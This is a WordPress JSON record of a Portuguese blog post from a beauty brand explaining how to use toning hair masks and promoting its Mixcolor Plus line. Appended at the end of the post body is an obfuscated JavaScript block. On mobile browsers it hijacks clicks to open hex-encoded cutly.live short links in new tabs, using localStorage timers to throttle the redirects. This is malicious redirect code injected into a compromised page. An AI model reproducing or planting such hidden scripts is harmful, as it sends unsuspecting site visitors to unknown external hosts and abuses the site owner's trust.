{"id":1000,"date":"2021-06-28T14:38:11","date_gmt":"2021-06-28T17:38:11","guid":{"rendered":"https:\/\/imbeauty.com.br\/?p=961"},"modified":"2021-06-28T14:38:11","modified_gmt":"2021-06-28T17:38:11","slug":"como-utilizar-as-mascaras-matizadoras","status":"publish","type":"post","link":"https:\/\/site.imbeautyacademy.com.br\/index.php\/2021\/06\/28\/como-utilizar-as-mascaras-matizadoras\/","title":{"rendered":"Como Utilizar as M\u00e1scaras Matizadoras?"},"content":{"rendered":"<h5>Para que Servem as M\u00e1scaras Matizadoras? Ser\u00e1 que voc\u00ea utiliza de Forma Correta?<\/h5>\n<h5><a href=\"https:\/\/imbeauty.com.br\/\"><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-medium wp-image-980\" src=\"https:\/\/imbeauty.com.br\/wp-content\/uploads\/2021\/06\/76799758_1036003726735483_2065479893719855948_n-251x300.jpg\" alt=\"\" width=\"251\" height=\"300\" \/><\/a><\/h5>\n<p>Todo mundo aprecia uma linda cor nos cabelos, por isso \u00e9 importante saber como utilizar as m\u00e1scaras matizadoras. Ent\u00e3o, mudar a cor dos cabelos \u00e9 a paix\u00e3o das brasileiras e se engana quem acha que os matizadores s\u00e3o apenas para as loiras, esse produto \u00e9 para as ruivas tamb\u00e9m. Independente de qual for o tom, com o tempo os fios desbotam e ficam amarelados ou alaranjados. Resultado da oxida\u00e7\u00e3o causada por agressores externos como \u00e1gua clorada, banhos de mar, sol, etc.<\/p>\n<p>Por esse motivo, os matizadores s\u00e3o indicados para a manuten\u00e7\u00e3o de cabelos tingidos e descoloridos, atuam basicamente como corretores de tonalidade. A f\u00f3rmula pigmentada dos matizadores \u00e9 capaz de combater tons indesejados e neutralizar reflexos amarelados, alaranjados ou avermelhados reavivando o brilho e a cor dos cabelos nos intervalos de retorno ao sal\u00e3o. Mas, voc\u00ea sabe qual matizador \u00e9 mais apropriado para os seus cabelos? Sabe utilizar de forma correta?<\/p>\n<h5>Matizadores Indicados para Tons de Amarelo Alaranjado<\/h5>\n<p><img decoding=\"async\" class=\"wp-image-963 alignleft\" src=\"https:\/\/imbeauty.com.br\/wp-content\/uploads\/2021\/06\/posts-cabelo-02-267x300.jpg\" alt=\"\" width=\"265\" height=\"298\" \/><img decoding=\"async\" class=\"aligncenter wp-image-964\" src=\"https:\/\/imbeauty.com.br\/wp-content\/uploads\/2021\/06\/posts-cabelo-267x300.jpg\" alt=\"\" width=\"271\" height=\"304\" \/><\/p>\n<p>O pigmento mais indicado para neutralizar tons de amarelo alaranjado s\u00e3o os matizadores violeta azulados e existem kits compostos por shampoos, condicionadores e m\u00e1scaras. Esse tipo de formula\u00e7\u00e3o age de maneira muito uniforme nos fios, seguindo o conceito da colorimetria os pigmentos recobrem os fios amarelados criando uma pel\u00edcula neutralizante. Nas partes mais escuras de amarelo alaranjado, a pigmenta\u00e7\u00e3o tamb\u00e9m age de forma efetiva, pois suas macromol\u00e9culas criam uma maquiagem tempor\u00e1ria. Uma outra novidade \u00e9 que j\u00e1 existem no mercado m\u00e1scaras vermelhas e acobreadas tamb\u00e9m. Falaremos sobre isso na sequ\u00eancia!<\/p>\n<h5>Existem M\u00e1caras Matizadoras para Cabelos Ruivos?<\/h5>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=E25Rmhzt01A\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-967\" src=\"https:\/\/imbeauty.com.br\/wp-content\/uploads\/2021\/06\/89284658_647341296049194_7123205197582703173_n-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" \/><\/a><br \/>\nAs pessoas buscam o tom de ruivo acobreado perfeito, pois existe uma grande variedade de tons no mercado de colora\u00e7\u00e3o. \u00c9 poss\u00edvel encontrar loiros acobreados com v\u00e1rios reflexos diferentes. Alguns puxam para dourado, outros para o vermelho e outros sofrem a interfer\u00eancia do marrom. A linha Mixcolor Plus tem dois cobres bel\u00edssimos e aut\u00eanticos, nas numera\u00e7\u00f5es 7.4 e 8.44. O importante \u00e9 voc\u00ea saber que ap\u00f3s colorir dever\u00e1 utilizar matizadores nos intervalos da aplica\u00e7\u00e3o da tinta, pois isso te dar\u00e1 a garantia de tons sempre lindos, seja ele um vermelho ou um cobre genu\u00edno.<\/p>\n<h5>Quantas vezes por semana pode usar o matizador?<\/h5>\n<p><a href=\"https:\/\/loja.imbeauty.com.br\/produto\/mascara-matizadora-violeta-home-care-250g\/\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-970\" src=\"https:\/\/imbeauty.com.br\/wp-content\/uploads\/2021\/06\/106251459_311498589894681_1799031883590410622_n-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" \/><\/a><br \/>\n\u00c9 importante considerar que as m\u00e1scaras matizadoras n\u00e3o substituem as m\u00e1scaras hidratantes e de nutri\u00e7\u00e3o. De uma forma geral, nas primeiras semanas ap\u00f3s a descolora\u00e7\u00e3o, uma vez por semana \u00e9 suficiente. Conforme o tempo vai passando, a necessidade de neutraliza\u00e7\u00e3o pode aumentar ou diminuir, isso depende do n\u00famero de lavagens que voc\u00ea faz e se frequenta praia, piscina, etc. Ent\u00e3o observe os fios e intercale a m\u00e1scara matizadora com hidrata\u00e7\u00f5es com cremes potentes e sempre leve em considera\u00e7\u00e3o a for\u00e7a e a intensidade do pigmento da marca escolhida.<\/p>\n<h5>Vantagens da m\u00e1scara matizadora Mixcolor Plus:<\/h5>\n<p><a href=\"https:\/\/loja.imbeauty.com.br\/produto\/shampoo-matizador-violeta-profissional-1l\/\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-971\" src=\"https:\/\/imbeauty.com.br\/wp-content\/uploads\/2021\/06\/160932121_780211072900937_3798717130710572926_n-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" \/><\/a><\/p>\n<p>A m\u00e1scara matizadora violeta Mixcolor Plus foi desenvolvida para a manuten\u00e7\u00e3o dos cabelos loiros claros, pois al\u00e9m de hidratar e neutralizar tons amarelados indesejados, Possui alta tecnologia com base no \u00f3leo de argan, que deixa o cabelo sedoso e com aspecto devidamente tratado, isso se d\u00e1 devido \u00e0 reposi\u00e7\u00e3o de massa lip\u00eddica, que \u00e9 fundamental fazer logo depois de um processo qu\u00edmico de descolora\u00e7\u00e3o ou de colora\u00e7\u00e3o. Al\u00e9m disso, possui filtro solar para proteger os fios das agress\u00f5es dos raios UV.<\/p>\n<p>A linha de matizadores da ImBeauty Professional possui nanotecnologia de part\u00edculas violetas, que tem como principal objetivo neutralizar os tons amarelos, t\u00e3o indesejados para as loiras. Al\u00e9m disso, promove efeitos que v\u00e3o do louro perolado ao platinado, mantendo as cores vivas e brilhantes. Est\u00e1 dispon\u00edvel em embalagens maiores para o uso dos profissionais no sal\u00e3o e kits home care, para as clientes darem continuidade aos tratamentos de sal\u00e3o em suas pr\u00f3prias casas.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x72\\x6f\\x56\\x32\\x63\\x352','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x45\\x73\\x67\\x33\\x63\\x393','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x41\\x4c\\x64\\x30\\x63\\x350','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6e\\x41\\x71\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x47\\x78\\x43\\x36\\x63\\x396','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x6b\\x61\\x4f\\x38\\x63\\x398','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x5a\\x71\\x77\\x35\\x63\\x375','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x53\\x6c\\x79\\x31\\x63\\x331',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x4a\\x76\\x72\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x6c\\x69\\x76\\x65\\x2f\\x62\\x55\\x63\\x39\\x63\\x329','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Para que Servem as M\u00e1scaras Matizadoras? Ser\u00e1 que voc\u00ea utiliza de Forma Correta? Todo mundo aprecia uma linda cor nos cabelos, por isso \u00e9 importante saber como utilizar as m\u00e1scaras matizadoras. Ent\u00e3o, mudar a cor dos cabelos \u00e9 a paix\u00e3o das brasileiras e se engana quem acha que os matizadores s\u00e3o apenas para as loiras, esse produto \u00e9 para as ruivas tamb\u00e9m. Independente de qual for o tom, com o tempo os fios desbotam e ficam amarelados ou alaranjados. Resultado da oxida\u00e7\u00e3o causada por agressores externos como \u00e1gua clorada, banhos de mar, sol, etc. Por esse motivo, os matizadores s\u00e3o indicados para a manuten\u00e7\u00e3o de cabelos tingidos e descoloridos, atuam basicamente como corretores de tonalidade. A f\u00f3rmula pigmentada dos matizadores \u00e9 capaz de combater tons indesejados e neutralizar reflexos amarelados, alaranjados ou avermelhados reavivando o brilho e a cor dos cabelos nos intervalos de retorno ao sal\u00e3o. Mas, voc\u00ea sabe&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"https:\/\/site.imbeautyacademy.com.br\/index.php\/2021\/06\/28\/como-utilizar-as-mascaras-matizadoras\/\">Leia mais<\/a><\/p>\n","protected":false},"author":1,"featured_media":1703,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1000","post","type-post","status-publish","format-standard","has-post-thumbnail","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/posts\/1000","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=1000"}],"version-history":[{"count":0,"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/posts\/1000\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/media\/1703"}],"wp:attachment":[{"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=1000"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=1000"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/site.imbeautyacademy.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=1000"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}